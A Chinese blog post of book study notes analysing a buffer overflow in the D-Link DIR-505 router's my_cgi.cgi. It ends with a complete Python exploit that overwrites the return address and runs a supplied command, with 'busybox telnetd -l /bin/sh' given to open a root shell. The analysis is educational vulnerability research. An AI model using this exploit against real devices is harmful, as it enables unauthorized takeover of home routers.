揭秘家用路由器0day漏洞挖掘技术读书笔记 D-Link DIR-505 my_cgi.cgi溢出漏洞分析

最新推荐文章于 2024-08-05 14:35:20 发布
最新推荐文章于 2024-08-05 14:35:20 发布
阅读量2.5k 收藏 4
点赞数 2
分类专栏: IOT安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32400847/article/details/78161401
版权

固件下载地址
漏洞描述如下。
这里写图片描述
下载之后解压缩得到DIR505A1_FW108B10.bin,通过binwalk提取出文件系统。
这里写图片描述
我们使用下面的脚本直接进行动态调试。根据my_cgi.cgi main函数反编译后的结果可知脚本中CONTENT-TYPE不能为multipart/form-data,SCRIPT_NAME不能为HNAP1。
这里写图片描述
这里写图片描述
漏洞在于处理POST参数中storage_path参数的值时发生了缓冲区溢出,所以需要构造storage_path=xxx形式的输入。IDA中显示storage_path有八处调用。
这里写图片描述
在这八处调用中有一个get_input_entries函数,不妨先看看这个函数。运行脚本附加之后在get_input_entries调用位置0x0040A638下断点。通过动态调试+静态分析可以将该函数循环体的部分还原成如下所示的伪代码。该函数循环体的部分也就是红色块左边的部分,s3来自第二个参数a1也就是CONTENT_LENGTH,但是该函数中没有大小限制,如果CONTENT_LENGTH大于buf的长度就可能造成溢出。
这里写图片描述
这里写图片描述
这里写图片描述
阅读红色块右边部分的代码可以得知参数的伪造需要遵照storage_path=xxx的形式,因为此时get_input_entries函数不会对参数值调用replace_special_char函数进行解码而是直接进入返回流程,否则get_input_entries函数在执行replace_special_char函数时会报错,进而导致程序崩溃。
这里写图片描述
查看main+0x7F8处对get_input_entries的调用可以得知CONTENT_LENGTH来自HTTP协议的content-length字段,这个值是攻击者可控的。验证一下POC中的偏移,确实是正确的。
这里写图片描述
在IDA中寻找system的交叉引用,发现get_remote_mac+CC处调用了system("command"),且参数command布置在返回地址偏移+0x28处即可。
这里写图片描述
按照DIR505L-storage_path.py 192.168.0.1 "busybox telnetd -l /bin/sh"执行下面的代码就可以获得shell了。

#!/usr/bin/env python
# #

import sys
import urllib2

try:
    target = sys.argv[1]
    command = sys.argv[2]
except:
    print "Usage: %s <target> <command>" % sys.argv[0]
    sys.exit(1)

url = "http://%s/my_cgi.cgi" % target

buf  = "storage_path="      # POST parameter name
buf += "D" * 477472   # Stack filler
buf += "\x00\x40\x5B\x1C"   # Overwrite $ra
buf += "E" * 0x28           # Command to execute must be at $sp+0x28
buf += command              # Command to execute
buf += "\x00"               # NULL terminate the command

req = urllib2.Request(url, buf)
print urllib2.urlopen(req).read()
houjingyi233
关注
专栏目录
物联网漏洞挖掘入门--DLINK-DIR-645路由器溢出漏洞分析复现
墨痕诉清风的博客
09-11 3780
https://www.rapid7.de/db/modules/exploit/linux/http/dlink_hedwig_cgi_bof 这个栈溢出的原因是由于cookie的值过长导致的栈溢出。服务端取得客户端请求的HTTP头中Cookie字段中uid的值,格式化到栈上导致溢出。通过对漏洞点进行分析,搭建模拟环境并完成整个漏洞利用过程。 (文章中有不足之处,还请各位......
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2242
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
揭秘家用路由器0day漏洞挖掘技术.pdf
10-22
揭秘家用路由器0day漏洞挖掘技术.pdf 仅供用学习交流使用,不可用于商业用途,如有版权问题,请联系删除!
揭秘家用路由器0day漏洞挖掘技术读书笔记 D-Link DIR-645 authentication.cgi溢出漏洞分析
houjingyi的博客
10-04 2127
固件下载地址 漏洞描述如下。 上一篇讲了DIR-815 hedwig.cgi中的漏洞成因及利用方式,这一篇来讲DIR-645 authentication.cgi中的漏洞成因及利用方式。下载之后解压缩得到dir645_FW_103.bin,通过binwalk提取出文件系统。 需要分析的还是/htdocs/cgibin这个程序。我们根据POC使用下面的脚本直接进行动态调试。 a
小米AX9000路由器CVE-2023-26315漏洞挖掘
最新发布
2301_80127209的博客
08-05 738
一年多前,看到小米SRC公众号推文搞了个赏金活动,于是挖了挖当时比较新的一款AX9000路由器,挖到了两个命令注入漏洞,不过没什么本事,挖的都是授权后的,危害一般。小米给的赏金还是很可观的,但是补丁发布的速度不知为何比较慢(交了这么多厂商,还是Zyxel和华硕的响应速度最快),所以一直也没能分配CVE编号,我也遵守小米的规定在漏洞披露前未公开相关漏洞细节。
《解密家用路由器0day漏洞挖掘技术》学习笔记
zxyccm的博客
07-17 1820
家用路由器 漏洞挖掘技术 路由器漏洞
揭秘家用路由器0day漏洞挖掘技术》 试读
IT学习笔记
09-03 642
记得今年央视的315晚会上,主持人让现场的观众连接会场的公共WIFI,随意上网,不久以后,大屏幕上就出现了大家的照片,微博等等私人信息。也就是说,通过连接WIFI,手机上网的数据已经被截获并被解析,大家的账号和密码也被破解了。 有些人可能会说,这个事情离我们很远,反正我不用公共的WIFI,但是如果你家的路由器漏洞,也许你的账号就不安全了。 所以当看到《揭秘家用路由器0day漏洞挖掘技...
揭秘家用路由器0day漏洞挖掘技术原始环境搭建
NEARU的专栏
12-06 872
对于未知的复杂事物,应该先去跟谁它,观察它,然后挖掘其规律。《揭秘家用路由器0day漏洞挖掘技术》出版于2015年,使用的系统环境为ubuntu-12.04.4-desktop-i386(ubuntu12 32 bit 桌面版)。里面涉及的dir-645,dir-815等的溢出漏洞,在exploit-db上的时间为2013年前段,距离当前(2019)已经6年多了。作者当初使用相关的软件和系统距今发...
D-Link DIR505路由器溢出漏洞实战
牛叫兽的测试学习和分享
12-14 5113
IOT安全,溢出漏洞学习实践
D-LINK DIR 618最新升包1.04(A1固件)
07-01
D-LINK DIR 618无线丢下你频繁实在是让人头痛,忍无可忍与技术服务人员沟通后,发给我的升级包,官网没有的哦,2013-07-01月份发给我的。用此款路由器必须升级,速下! 升级步骤: 先下载发给您的升级文件到桌面,...
D-LINK DIR823PRO 路由器更新固件为openwrt-18.06.1 支持802.11s组建mesh
lang999888的专栏
03-05 6575
D-LINK DIR823PRO路由器是双频千兆路由器,芯片为mtk7628an+mtk7612en,16M闪存,64M内存。 原厂固件版本较旧,很多协议不支持,比如802.11s组建mesh网络。 这里记录如何刷写openwrt18.06.1版本的固件。openwrt-ramips-mt76x8-dir-823pro-squashfs-sysupgrade.bin 下载地址 https:/...
揭秘家用路由器0day漏洞挖掘技术.zip
07-22
揭秘家用路由器0day漏洞挖掘技术》理论与实践结合,全面、深入地分析家用路由器的安全漏洞,包括Web应用漏洞、栈溢出漏洞等,并辅以大量案例进行了翔实的分析。《揭秘家用路由器0day漏洞挖掘技术》针对家用路由器这一新领域进行漏洞的挖掘与分析,其原理和方法同样适用于智能设备、物联网等。
家用路由器0day漏洞挖掘技术.rar
03-23
揭秘家用路由器0day漏洞挖掘技术
友讯(DlinkDIR-505便携云机简体中文语言文件
08-10
Dlink DIR-505 A1&A2硬件通用简体中文语言文件,各版本硬件通用
家用路由器漏洞挖掘工具和资源
07-22
路由器漏洞挖掘技术和资源
试读《揭秘家用路由器0day漏洞挖掘技术
海兰
08-19 538
引子        当前,随着时代的发展,网络技术的不断进步,不论企业还是个人都越来越离不开网络,网络安全也逐渐引起了人们的关注。然而,在由无数个节点和链路构建起来的纷繁复杂的网络系统中,看似简单的路由器却是网络系统中最为核心的节点,是能够影响网络安全的关键设备。因此,在网络安全管理上,在现代网络通信设备网络路由器是最重要的,作为一个桥梁连接两个不同的网段,路由器越来越被人们所重视。   ...
路由器0day漏洞挖掘技术
Post Due To Vacuity
07-18 949
【参考】 解密家用路由器0day漏洞挖掘技术
揭秘家用路由器0day漏洞挖掘技术读书笔记 D-Link DIR-815 hedwig.cgi溢出漏洞分析
houjingyi的博客
10-03 6695
准备工作环境搭建 问题1: 用32位的系统,原因之后会详细说。 问题2: 如果用wine+IDA6.8的话由于后续会使用到IDAPython插件,故还需要下载https://www.dllme.com/dll/download/14091/python27.dll并放置到ida根目录下。同时以如下方式启动idaq.exe:export PYTHONPATH=/usr/lib/python2.
揭秘家用路由器0day漏洞挖掘技术 pdf
06-21
### 回答1: 《揭秘家用路由器0day漏洞挖掘技术》是一本讲解家用路由器漏洞挖掘技术书籍。这本书主要讲述了路由器漏洞的挖掘原理、方法和步骤,以及如何利用漏洞获取系统的管理员权限。 书中首先介绍了家用路由器的基本原理和工作模式,以及路由器的基本安全机制,包括密码验证、防火墙等,再讲述了路由器漏洞的基础知识,如堆栈溢出、格式化字符串漏洞等,为读者打下了扎实的理论基础。 接着,书中详细讲解了路由器漏洞的挖掘方法和技巧,包括静态分析、动态分析和Fuzzing技术,其中尤其强调了Fuzzing技术的重要性。Fuzzing技术是一种自动化的漏洞测试方法,通过向系统输入大量随机的无效数据,来寻找系统的漏洞,是现代漏洞挖掘技术中不可缺少的一部分。 最后,书中还分享了一些实用的漏洞利用技巧,如ROP链、GOT覆盖等,帮助读者能够深入理解漏洞利用的原理和方法,更好地应对各种复杂情况。 总的来说,《揭秘家用路由器0day漏洞挖掘技术》是一本非常实用的技术书籍,对于研究家用路由器安全的人员来说是一本不错的参考书。同时,对于网络安全爱好者,这本书也有很好的启发和帮助作用。 ### 回答2: 《揭秘家用路由器0day漏洞挖掘技术》是一份技术文档,主要介绍了基于路由器0day漏洞挖掘技术和攻击方法。首先,文档介绍了路由器的基本结构和工作原理,包括路由器的硬件和软件组成,以及路由器的主要功能。其次,文档讲解了如何使用路由器的操作系统和开源工具进行漏洞分析和挖掘。最后,文档介绍了一些实际案例,包括路由器上的重大漏洞和针对路由器的攻击手段。 在文档中,作者重点介绍了路由器中常见的漏洞类型,包括缓冲区溢出、格式化字符串漏洞等,以及漏洞挖掘的一般方法。特别是在讲解缓冲区溢出漏洞时,作者详细地介绍了漏洞的原理、危害和检测方法,为有志于从事漏洞挖掘工作的安全研究员提供了有益的指导和参考。 除了讲解漏洞挖掘技术,文档还介绍了路由器中常见的攻击手段,如ARP欺骗、DNS劫持、端口扫描和DDoS攻击等。同时,文档也指出了如何通过安全配置和固件升级等方法来提高路由器的安全性。 总之,这份文档从技术方面全面详细地介绍了家用路由器漏洞和攻击,为安全研究工作者提供了更深入的认识和了解,也提醒用户关注家用路由器的安全性。需要指出的是,本文档旨在为安全研究和教育提供帮助,对非法攻击行为不作任何支持或鼓励。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值